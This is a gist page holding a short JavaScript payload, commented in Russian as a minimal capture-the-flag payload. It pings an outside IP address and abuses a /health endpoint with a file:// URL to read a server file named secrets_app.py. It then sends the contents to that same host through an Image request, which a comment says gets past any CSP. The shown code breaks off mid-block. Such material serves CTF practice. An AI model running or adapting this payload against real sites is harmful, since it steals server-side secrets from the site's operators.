This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Минимальный payload для CTF | |
| fetch('http://209.38.254.85:8543/?loaded=1'); | |
| fetch('/health?url=file:///usr/src/app/secrets_app.py') | |
| .then(r => r.text()) | |
| .then(data => { | |
| // Отправляем через Image (работает при любом CSP) | |
| new Image().src = 'http://209.38.254.85:8543/?flag=' + | |
| encodeURIComponent(data.substring(0, 2000)); | |
| }) | |
| .catch(e => { |